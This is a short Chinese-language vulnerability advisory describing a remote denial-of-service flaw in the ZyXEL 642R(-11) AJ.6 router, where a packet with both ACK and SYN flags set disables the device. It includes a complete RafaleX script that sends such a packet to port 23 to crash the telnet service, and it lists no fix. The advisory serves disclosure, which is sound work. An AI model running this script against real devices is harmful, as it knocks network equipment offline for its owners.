ZyXEL 642R(-11) AJ.6存在拒绝服务攻击发布时间:2002-06-19 更新时间:2002-06-19 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 ZyXEL 642R(-11) AJ.6详细描述 ZyXEL 642R(-11) AJ.6在处理特殊包时存在拒绝服务,通过发送包含ACK和SYN同时设置的包,可使路由器即使通过RS-232也不能工作。 测试代码 # This is a RafaleX script (Download: www.packx.net) # Rafale X script # --------------- # Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23 # %name=ZyXEL telnet service DoS %category=Denial of service %date=23-05-2002 %rafalemin=0.2 %description=Crash ZyXEL router telnet service with ACK and SYN flag // Variables $done=Target attacked... // Do the stuff... !Display=Please wait... !Sleep 500 PORTDST=23 IPHEADERSIZE=20 ACK=1 SYN=1 !Display=Sending the packet... !SEND 1 TCP !Sleep 200 !Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6)) !Sleep 1000 !Display=$done 解决方案 尚无 相关信息 Kistler Ueli (iuk@gmx.ch) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-06/0170.html |
